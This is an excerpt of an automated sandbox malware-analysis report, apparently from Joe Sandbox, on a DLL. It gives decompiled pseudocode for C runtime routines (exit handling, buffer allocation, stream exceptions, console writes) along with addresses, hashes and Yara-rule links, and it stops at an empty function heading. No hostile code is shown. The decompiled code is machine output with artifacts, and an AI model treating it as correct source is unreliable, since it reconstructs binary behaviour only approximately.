FreeLibrary.KERNEL32(00000000,?,00000000,6DA7277B,000000FF,?,6DA615C2,?,?,6DA61596,00000016), ref: 6DA6169B

Strings

mscoree.dll, xrefs: 6DA61660
CorExitProcess, xrefs: 6DA61671

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 94f73e29590672e42d8b03740881f7cc42a2ea2f84f89bb47cc31c10a330e504
Instruction ID: 12188c32757082eaa55d998280f10ced5afe547a799373e861b3e4f13a24e331
Opcode Fuzzy Hash: 94f73e29590672e42d8b03740881f7cc42a2ea2f84f89bb47cc31c10a330e504
Instruction Fuzzy Hash: BA01673D908665EFDF119F50CC04FBEBBB8FB06715F048525F921A2290D7789941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA674B4 Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E6DA674B4(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr _t46;
				signed int _t49;
				void* _t52;
				signed int _t56;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				signed int _t99;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr* _t103;
				void* _t106;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x6da83014; // 0xa0d58914
				_v8 = _t41 ^ _t99;
				_t73 = _a20;
				if(_t73 > 0) {
					_t71 = E6DA60C3D(_a16, _t73);
					_t106 = _t71 - _t73;
					_t4 = _t71 + 1; // 0x1
					_t73 = _t4;
					if(_t106 >= 0) {
						_t73 = _t71;
					}
				}
				_t77 = _a32;
				if(_a32 == 0) {
					_t70 =  *((intOrPtr*)( *_a4 + 8));
					_t77 = _t70;
					_a32 = _t70;
				}
				_t46 = E6DA68F05(_t77, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t73, 0, 0);
				_t101 = _t100 + 0x18;
				_v12 = _t46;
				if(_t46 == 0) {
					L41:
					_pop(_t92);
					_pop(_t95);
					_pop(_t74);
					return E6DA59B91(_t46, _t74, _v8 ^ _t99, 0x400, _t92, _t95);
				} else {
					_t16 = _t46 + _t46 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t46 + _t46 & _t16;
					if(_t49 == 0) {
						_t96 = 0;
						L39:
						_t75 = 0;
						L40:
						E6DA5937B(_t96);
						_t46 = _t75;
						goto L41;
					}
					if(_t49 > 0x400) {
						_t93 = E6DA6458B(_t49);
						if(_t93 == 0) {
							L13:
							_t96 = _t93;
							if(_t93 == 0) {
								goto L39;
							}
							_t52 = E6DA68F05(_a32, 1, _a16, _t73, _t93, _v12);
							_t103 = _t101 + 0x18;
							if(_t52 == 0) {
								goto L39;
							}
							_t97 = _v12;
							_t75 = E6DA6694F(_a8, _a12, _t93, _v12, 0, 0, 0, 0, 0);
							if(_t75 == 0) {
								L19:
								_t96 = _t93;
								goto L39;
							}
							if((_a12 & 0x00000400) == 0) {
								_t31 = _t75 + _t75 + 8; // 0x8
								asm("sbb eax, eax");
								_t56 = _t75 + _t75 & _t31;
								if(_t56 == 0) {
									_t98 = 0;
									L37:
									E6DA5937B(_t98);
									goto L19;
								}
								if(_t56 > 0x400) {
									_t98 = E6DA6458B(_t56);
									if(_t98 == 0) {
										goto L37;
									}
									 *_t98 = 0xdddd;
									L28:
									_t98 = _t98 + 8;
									if(_t98 == 0 || E6DA6694F(_a8, _a12, _t93, _v12, _t98, _t75, 0, 0, 0) == 0) {
										goto L37;
									} else {
										_push(0);
										_push(0);
										if(_a28 != 0) {
											_push(_a28);
											_push(_a24);
										} else {
											_push(0);
											_push(0);
										}
										_push(_t75);
										_push(_t98);
										_push(0);
										_push(_a32);
										_t75 = E6DA68F81();
										if(_t75 == 0) {
											goto L37;
										} else {
											E6DA5937B(_t98);
											L34:
											_t96 = _t93;
											goto L40;
										}
									}
								}
								E6DA59C20(_t56);
								_t98 = _t103;
								if(_t98 == 0) {
									goto L37;
								}
								 *_t98 = 0xcccc;
								goto L28;
							}
							_t65 = _a28;
							if(_t65 == 0) {
								goto L34;
							}
							if(_t75 <= _t65) {
								_t75 = E6DA6694F(_a8, _a12, _t93, _t97, _a24, _t65, 0, 0, 0);
								if(_t75 != 0) {
									goto L34;
								}
							}
							goto L19;
						}
						 *_t93 = 0xdddd;
						L12:
						_t93 = _t93 + 8;
						goto L13;
					}
					E6DA59C20(_t49);
					_t93 = _t101;
					if(_t93 == 0) {
						goto L13;
					}
					 *_t93 = 0xcccc;
					goto L12;
				}
			}

0x6da674b9
0x6da674ba
0x6da674bb
0x6da674c2
0x6da674c6
0x6da674cd
0x6da674d3
0x6da674d9
0x6da674dc
0x6da674dc
0x6da674df
0x6da674e1
0x6da674e1
0x6da674df
0x6da674e3
0x6da674e8
0x6da674ef
0x6da674f2
0x6da674f4
0x6da674f4
0x6da67510
0x6da67515
0x6da67518
0x6da6751d
0x6da67690
0x6da67693
0x6da67694
0x6da67695
0x6da676a1
0x6da67523
0x6da67525
0x6da6752a
0x6da6752c
0x6da6752e
0x6da67683
0x6da67685
0x6da67685
0x6da67687
0x6da67688
0x6da6768e
0x00000000
0x6da6768e
0x6da67539
0x6da67554
0x6da67559
0x6da67564
0x6da67564
0x6da67568
0x00000000
0x00000000
0x6da6757b
0x6da67580
0x6da67585
0x00000000
0x00000000
0x6da6758b
0x6da675a2
0x6da675a6
0x6da675c1
0x6da675c1
0x00000000
0x6da675c1
0x6da675b0
0x6da675ed
0x6da675f2
0x6da675f4
0x6da675f6
0x6da67675
0x6da67677
0x6da67678
0x00000000
0x6da6767d
0x6da675fa
0x6da67615
0x6da6761a
0x00000000
0x00000000
0x6da6761c
0x6da67622
0x6da67622
0x6da67627
0x00000000
0x6da67643
0x6da67645
0x6da67646
0x6da6764a
0x6da6766d
0x6da67670
0x6da6764c
0x6da6764c
0x6da6764d
0x6da6764d
0x6da6764e
0x6da6764f
0x6da67650
0x6da67651
0x6da67659
0x6da67660
0x00000000
0x6da67662
0x6da67663
0x6da67669
0x6da67669
0x00000000
0x6da67669
0x6da67660
0x6da67627
0x6da675fc
0x6da67601
0x6da67605
0x00000000
0x00000000
0x6da67607
0x00000000
0x6da67607
0x6da675b2
0x6da675b7
0x00000000
0x00000000
0x6da675bf
0x6da675de
0x6da675e2
0x00000000
0x00000000
0x6da675e8
0x00000000
0x6da675bf
0x6da6755b
0x6da67561
0x6da67561
0x00000000
0x6da67561
0x6da6753b
0x6da67540
0x6da67544
0x00000000
0x00000000
0x6da67546
0x00000000
0x6da67546

APIs

__alloca_probe_16.LIBCMT ref: 6DA6753B
__alloca_probe_16.LIBCMT ref: 6DA675FC
__freea.LIBCMT ref: 6DA67663

Part of subcall function 6DA6458B: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6DA645BD

__freea.LIBCMT ref: 6DA67678
__freea.LIBCMT ref: 6DA67688

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: da983a73a3d5352f02b8e4ac104bbdd4fd68c714c5f6bae8fa1b5db7680dd5b2
Instruction ID: d56076200c8482634f82d687f38868ead0a3d072c652113a25f6587587eb6e25
Opcode Fuzzy Hash: da983a73a3d5352f02b8e4ac104bbdd4fd68c714c5f6bae8fa1b5db7680dd5b2
Instruction Fuzzy Hash: F951C4B6A2C287EFEB018F68CD40EBB36A9EF44354B164168FE14D6550E771CC9086B0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA52D40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6DA52D40(void* __ebx, void* __ecx, signed int _a4, char _a8) {
				char _v24;
				char _v32;
				intOrPtr _v48;
				signed int _t20;
				void* _t22;
				void* _t32;
				signed char _t35;
				intOrPtr* _t37;
				char* _t40;
				intOrPtr* _t42;
				intOrPtr _t45;

				_t32 = __ebx;
				_t20 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t20;
				_t35 =  *(__ecx + 0x10) & _t20;
				if(_t35 == 0) {
					return _t20;
				} else {
					if(_a8 != 0) {
						E6DA5AA9D(0, 0);
					}
					if((_t35 & 0x00000004) == 0) {
						_t40 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
					} else {
						_t40 = "ios_base::badbit set";
					}
					_t22 = E6DA525A0( &_v32);
					_t37 =  &_v24;
					E6DA52C70(_t32, _t37, _t40, _t22);
					E6DA5AA9D( &_v32, 0x6da817a0);
					asm("int3");
					_t45 = _v48;
					asm("xorps xmm0, xmm0");
					_t42 = _t37;
					 *_t42 = 0x6da74214;
					asm("movq [eax], xmm0");
					_t14 = _t45 + 4; // 0x4
					E6DA5A701(_t14, _t42 + 4);
					 *_t42 = 0x6da7f434;
					 *((intOrPtr*)(_t42 + 0xc)) =  *((intOrPtr*)(_t45 + 0xc));
					 *((intOrPtr*)(_t42 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10));
					 *_t42 = 0x6da7f45c;
					return _t42;
				}
			}

0x6da52d40
0x6da52d4c
0x6da52d4f
0x6da52d55
0x6da52d57
0x6da52d64
0x6da52d59
0x6da52d5d
0x6da52d6b
0x6da52d6b
0x6da52d73
0x6da52d89
0x6da52d75
0x6da52d75
0x6da52d75
0x6da52d90
0x6da52d97
0x6da52d9b
0x6da52daa
0x6da52daf
0x6da52db4
0x6da52db7
0x6da52dbb
0x6da52dc1
0x6da52dc7
0x6da52dcb
0x6da52dcf
0x6da52dd4
0x6da52de3
0x6da52de8
0x6da52deb
0x6da52df4
0x6da52df4

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6DA52DCF

Part of subcall function 6DA5AA9D: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,6DA58868,?,6DA80F8C,0000001D,WIPTsfDddTRsYDKObDdZHPEivdAcq,0000001D), ref: 6DA5AAFD

Strings

ios_base::eofbit set, xrefs: 6DA52D84
ios_base::badbit set, xrefs: 6DA52D75
ios_base::failbit set, xrefs: 6DA52D7F

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 00c3923bf75a53d44a1a822500094cc16e85104a8ebe04095fe0c7bffee08480
Instruction ID: a80d326ef4de7e85f8edce7517e35c9c684cca9a987f303f5fb588a34cffaa42
Opcode Fuzzy Hash: 00c3923bf75a53d44a1a822500094cc16e85104a8ebe04095fe0c7bffee08480
Instruction Fuzzy Hash: B711E4B661C705ABC720CF68C801BA6B3A8BF41210F04852AEA248B240E730B5A0CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6FB75 Relevance: 6.3, APIs: 4, Instructions: 338
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E6DA6FB75(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(E6DA72846);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x6da83014; // 0xa0d58914
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x6daa5858 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E6DA5F860(_t265, _t291, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x6daa5858 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x6daa5858 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x6daa5858 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E6DA654AB(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E6DA654AB(_t273, _t292);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x6da83900; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x6daa5858 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E6DA6E2DE( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x6da83900)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x6daa5858 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E6DA5AB10( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x6daa5858 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E6DA6E2DE( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E6DA68F81(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E6DA59B91(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}

0x6da6fb7a
0x6da6fb7c
0x6da6fb87
0x6da6fb88
0x6da6fb8b
0x6da6fb90
0x6da6fb92
0x6da6fb98
0x6da6fb9c
0x6da6fba2
0x6da6fba7
0x6da6fbad
0x6da6fbb0
0x6da6fbb3
0x6da6fbb6
0x6da6fbb9
0x6da6fbbc
0x6da6fbc6
0x6da6fbcd
0x6da6fbd5
0x6da6fbd8
0x6da6fbde
0x6da6fbe2
0x6da6fbe5
0x6da6fbe9
0x6da6fbe9
0x6da6fbf1
0x6da6fbf9
0x6da6fbfe
0x6da6fbff
0x6da6fc00
0x6da6fc01
0x6da6fc04
0x6da6fc06
0x6da6fc0c
0x6da6fc12
0x6da6fc15
0x6da6fc17
0x6da6fc1a
0x6da6fc23
0x6da6fc29
0x6da6fc2c
0x6da6fc33
0x6da6fc3a
0x6da6fc3d
0x6da6fd77
0x6da6fd7b
0x6da6fd7e
0x6da6fda1
0x6da6fda7
0x6da6fda9
0x6da6fdad
0x6da6fdde
0x6da6fde1
0x6da6fde3
0x00000000
0x6da6fdaf
0x6da6fdaf
0x6da6fdb2
0x6da6fdb5
0x6da6fdb8
0x6da6ff02
0x6da6ff10
0x6da6ff19
0x6da6fdbe
0x6da6fdc8
0x6da6fdcd
0x6da6fdd0
0x6da6fdd3
0x6da6fdd9
0x00000000
0x6da6fdd9
0x6da6fdd3
0x6da6fdb8
0x6da6fd80
0x6da6fd87
0x6da6fd8a
0x6da6fd8d
0x6da6fd8f
0x6da6fd92
0x6da6fd99
0x6da6fd9b
0x6da6fde4
0x6da6fde7
0x6da6fde8
0x6da6fded
0x6da6fdf0
0x6da6fdf3
0x6da6fdf9
0x00000000
0x6da6fdf9
0x6da6fdf3
0x6da6fc43
0x6da6fc46
0x6da6fc48
0x6da6fc4a
0x6da6fc4e
0x6da6fc4f
0x6da6fc53
0x00000000
0x00000000
0x00000000
0x6da6fc53
0x6da6fc58
0x6da6fc5a
0x6da6fc5f
0x6da6fd1f
0x6da6fd26
0x6da6fd27
0x6da6fd2a
0x6da6fd2c
0x6da6fedc
0x6da6fede
0x00000000
0x6da6fee0
0x6da6fee0
0x6da6fee3
0x6da6fef2
0x6da6fef6
0x6da6fef7
0x6da6fef7
0x00000000
0x6da6fefb
0x00000000
0x6da6fd32
0x6da6fd37
0x6da6fd3a
0x6da6fd3d
0x6da6fd43
0x6da6fd4c
0x6da6fd57
0x6da6fd5c
0x6da6fd5f
0x6da6fd62
0x6da6fd6b
0x6da6fd6b
0x6da6fd6e
0x00000000
0x6da6fd6e
0x6da6fd62
0x6da6fc65
0x6da6fc68
0x6da6fc6e
0x6da6fc70
0x6da6fc7d
0x6da6fc7e
0x6da6fc81
0x6da6fc84
0x6da6fc89
0x6da6fead
0x6da6feaf
0x6da6feb1
0x6da6feb4
0x6da6feb7
0x6da6fec3
0x6da6fec6
0x6da6fec8
0x6da6fec9
0x6da6fecd
0x6da6fed0
0x6da6fed0
0x6da6fed4
0x6da6fed4
0x6da6fed4
0x6da6fed7
0x6da6fed7
0x6da6fc8f
0x6da6fc8f
0x6da6fc92
0x6da6fc94
0x6da6fc97
0x6da6fc99
0x6da6fc9d
0x6da6fc9e
0x6da6fc9f
0x6da6fca3
0x6da6fca8
0x6da6fcb2
0x6da6fcb7
0x6da6fcba
0x6da6fcba
0x6da6fcbd
0x6da6fcc0
0x6da6fcc2
0x6da6fcc5
0x6da6fcce
0x6da6fcd2
0x6da6fcd3
0x6da6fcda
0x6da6fce0
0x6da6fce8
0x6da6fcf3
0x6da6fcf8
0x6da6fd03
0x6da6fd08
0x6da6fd0e
0x6da6fd17
0x6da6fd71
0x6da6fd71
0x6da6fdfc
0x6da6fe01
0x6da6fe13
0x6da6fe18
0x6da6fe1b
0x6da6fe20
0x6da6fe3b
0x6da6ff1e
0x6da6ff24
0x6da6fe41
0x6da6fe41
0x6da6fe4c
0x6da6fe4e
0x6da6fe51
0x6da6fe5a
0x6da6fe64
0x00000000
0x6da6fe66
0x6da6fe68
0x6da6fe6a
0x6da6fe83
0x00000000
0x6da6fe89
0x6da6fe8d
0x6da6fe93
0x6da6fe96
0x6da6fe9c
0x6da6fe9f
0x00000000
0x6da6fe9f
0x6da6fe8d
0x6da6fe83
0x6da6fe64
0x6da6fe5a
0x6da6fe3b
0x6da6fe20
0x6da6fd0e
0x6da6fc89
0x6da6fc5f
0x00000000
0x6da6fea2
0x6da6fea2
0x6da6feab
0x6da6ff26
0x6da6ff2b
0x6da6ff33
0x6da6ff34
0x6da6ff35
0x6da6ff41
0x00000000

APIs

GetConsoleOutputCP.KERNEL32(A0D58914,?,00000000,?), ref: 6DA6FBD8

Part of subcall function 6DA68F81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6DA67659,?,00000000,-00000008), ref: 6DA6902D

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6DA6FE33
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6DA6FE7B
GetLastError.KERNEL32 ref: 6DA6FF1E

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: a8f0d545cd0a13a7f387ec00b1d10ec1f86f737dd2323a105407f25a29ebb880
Instruction ID: e17a1b6486bc39772fb0ea2a489c0c9ca7051d27a562085d2ea5291948dfcd97
Opcode Fuzzy Hash: a8f0d545cd0a13a7f387ec00b1d10ec1f86f737dd2323a105407f25a29ebb880
Instruction Fuzzy Hash: 0DD13C75D08299DFCF01CFA8C980AADBBB5FF49314F18856EE955E7241D730A982CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5C588 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

